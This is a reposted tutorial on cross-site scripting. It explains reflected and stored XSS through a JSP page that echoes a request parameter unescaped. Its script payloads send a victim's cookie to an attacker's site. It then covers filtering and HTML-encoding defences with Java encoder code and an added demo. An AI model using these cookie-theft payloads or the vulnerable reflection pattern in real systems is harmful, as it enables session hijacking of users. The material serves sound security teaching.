XSS attack and defense (repost)

Repost address: http://blog.csdn.net/ghsau/article/details/17027893

This article comes from: Gao Shuang|Coder , the original address: http://blog.csdn.net/ghsau/article/details/17027893 , please indicate when reprinting.
       XSS, also called CSS, is short for Cross Site Script (cross-site scripting attack) and is a common vulnerability in Web programs. XSS is a passive, client-side attack, so its harmfulness is easily overlooked. The principle is that an attacker enters (passes in) malicious HTML code into a website that has an XSS vulnerability; when other users browse that website, the HTML code is executed automatically, which achieves the attacker's goal, for example stealing user cookies, destroying the page structure, or redirecting to other websites.

XSS attack

       XSS attacks are similar to SQL injection attacks: before attacking, we first find a website with an XSS vulnerability. There are two types of XSS vulnerability, DOM Based XSS and Stored XSS. In theory, any input point where the input data is not processed can be an XSS vulnerability. How harmful the vulnerability is depends on the power of the attack code, and the attack code is not limited to scripts.

DOM Based XSS

       DOM Based XSS is an attack based on the DOM structure of a web page. Its characteristic is that only a small number of people are attacked.

       Scenario one:

       When I log in to a.com, I find that part of its page is displayed directly from a URL parameter called content. I guess its page-handling code looks something like this (a JSP is used for the test; other languages are similar):

<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
    <head>
        <title>XSS test</title>
    </head>
    <body>
        Page content: <%= request.getParameter("content") %>
    </body>
</html>

       When I enter a.com?content=<script>alert("xss")</script> in the browser, my script is executed as the browser renders the page, and the page outputs the word xss. That is me attacking myself; so how can I attack someone else and profit from it? I know that Tom has also registered on the website, and I know his email address (or some other contact channel that can receive messages), so I build a hyperlink and send it to him. The hyperlink address is: http://www.a.com?content=<script>window.open("www.b.com?param="+document.cookie)</script>. When Tom clicks this link (assuming he is logged in to a.com), his browser opens b.com directly and sends Tom's cookie for a.com to b.com. b.com is a website I built, so when my site receives the request I have stolen Tom's a.com cookie; the cookie may contain his login password, and the attack has succeeded! In this process the only victim is Tom himself.

Stored XSS

       Stored XSS is a storage-type XSS vulnerability. Because its attack code has been stored on the server or in the database, the victims are many people.

       Scenario two:

       Articles can be posted on a.com. After logging in, I post an article on a.com that contains malicious code, <script>window.open("www.b.com?param="+document.cookie)</script>, and save the article. Then Tom and Jack see the article I posted, and as soon as they view it they are both hit: their cookie information is sent to my server, and the attack succeeds! In this process there are multiple victims.
       A Stored XSS vulnerability is more harmful and affects a wider range of users.

XSS defense

       We live in a world of contradictions: where there is a spear, there is a shield. As long as there are no vulnerabilities in our code, the attacker has nothing to work with; we need to be an egg without a crack. XSS can be defended against in the following ways.

A complete filtering system

       Never trust user input. User input must be processed: only legal values are allowed, and all other values are filtered out.

Html encode

       If in some cases we cannot strictly filter user data, we still need to convert the tag characters.

less-than character (<)                                              -> &lt;
greater-than character (>)                                           -> &gt;
ampersand character (&)                                              -> &amp;
double-quote character (")                                           -> &quot;
space character ( )                                                  -> &nbsp;
any character whose ASCII code is greater than or equal to 0x80      -> &#<number>, where <number> is the character's code value

      For example, if the user enters: <script>window.location.href="http://www.baidu.com";</script>, what is finally stored after saving will be: &lt;script&gt;window.location.href=&quot;http://www.baidu.com&quot;&lt;/script&gt;. When the page is displayed, the browser converts these characters into text content for display rather than treating them as a piece of executable code.

Others

       Two methods of Html encode are provided below.
  • Use Apache's commons-lang.jar

    StringEscapeUtils.escapeHtml(str); // Chinese characters are converted to their corresponding character-code entities; spaces are not converted

  • Implement the conversion yourself, converting only some characters

    /** Encode a single character; characters not in the table are returned unchanged */
    private static String htmlEncode(char c) {
        switch (c) {
            case '&':
                return "&amp;";
            case '<':
                return "&lt;";
            case '>':
                return "&gt;";
            case '"':
                return "&quot;";
            case ' ':
                return "&nbsp;";
            default:
                return c + "";
        }
    }

    /** Performs Html encode conversion on the passed-in string str */
    public static String htmlEncode(String str) {
        if (str == null || str.trim().equals("")) return str;
        StringBuilder encodeStrBuilder = new StringBuilder();
        for (int i = 0, len = str.length(); i < len; i++) {
            encodeStrBuilder.append(htmlEncode(str.charAt(i)));
        }
        return encodeStrBuilder.toString();
    }
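As an added example that is not part of the original article or its code: a Java class that implements the complete conversion table from the Html encode section, including the &#<number> rule for characters at or above 0x80 that the hand-written method above leaves out, and uses it to render the scenario-one "content" parameter both raw (as the vulnerable JSP does) and encoded. The class name XssHtmlEncodeDemo, the renderVulnerable/renderDefended helpers and the sample inputs are all constructed for this example.

```java
/**
 * Added example (not the original article's code): an HTML encoder covering
 * the article's full conversion table, plus a tiny renderer that contrasts the
 * vulnerable reflection of the "content" parameter with the encoded version.
 */
public class XssHtmlEncodeDemo {

    /** Encode one Unicode code point according to the table in the article. */
    static String encodeCodePoint(int cp) {
        switch (cp) {
            case '<':  return "&lt;";
            case '>':  return "&gt;";
            case '&':  return "&amp;";
            case '"':  return "&quot;";
            case ' ':  return "&nbsp;";
            default:
                // Anything at or above 0x80 (e.g. Chinese text) becomes a numeric
                // character reference; plain ASCII is passed through unchanged.
                return cp >= 0x80 ? "&#" + cp + ";" : new String(Character.toChars(cp));
        }
    }

    /** Encode a whole string; null is returned as-is, like the article's version. */
    public static String htmlEncode(String str) {
        if (str == null) return null;
        StringBuilder out = new StringBuilder(str.length() + 16);
        // Iterate by code point so characters outside the BMP are not split
        // into two half-surrogates.
        str.codePoints().forEach(cp -> out.append(encodeCodePoint(cp)));
        return out.toString();
    }

    /** The vulnerable page from scenario one: the parameter is inserted raw. */
    static String renderVulnerable(String content) {
        return "Page content: " + content;
    }

    /** The defended page: same template, but the parameter is encoded first. */
    static String renderDefended(String content) {
        return "Page content: " + htmlEncode(content);
    }

    public static void main(String[] args) {
        // Constructed inputs: the cookie-stealing payload from scenario one, the
        // redirect example from the Html encode section, and some Chinese text.
        String[] samples = {
            "<script>window.open(\"www.b.com?param=\"+document.cookie)</script>",
            "<script>window.location.href=\"http://www.baidu.com\";</script>",
            "Tom & Jack 的文章"
        };
        for (String s : samples) {
            System.out.println("input     : " + s);
            System.out.println("vulnerable: " + renderVulnerable(s));
            System.out.println("defended  : " + renderDefended(s));
            System.out.println();
        }
    }
}
```

Run with `javac XssHtmlEncodeDemo.java && java XssHtmlEncodeDemo`. The "defended" line for each sample contains no `<`, `>` or `"`, so a browser shows the script text instead of running it, and the Chinese sample comes out as `&#...;` references, which is the behaviour the commons-lang comment above describes for escapeHtml. Two caveats a practitioner should keep in mind: turning every space into `&nbsp;` (as the article's table does, and as StringEscapeUtils.escapeHtml does not) stops the browser from line-wrapping the text, so many encoders leave spaces alone; and this encoding is only correct for HTML element content, so a value placed inside an attribute, a URL or a JavaScript block needs the encoding rules of that context instead.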

       (end)